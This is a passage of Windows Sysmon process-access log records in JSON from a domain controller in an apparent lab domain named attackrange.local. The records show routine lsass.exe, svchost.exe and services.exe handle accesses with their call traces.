C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.900","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1204,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.901\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.901","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1205,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.901\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.901","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1206,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.901\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.901","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1207,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.901\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.901","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1208,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.901\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.901","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1209,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.901\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.901","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1210,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.901\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.901","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
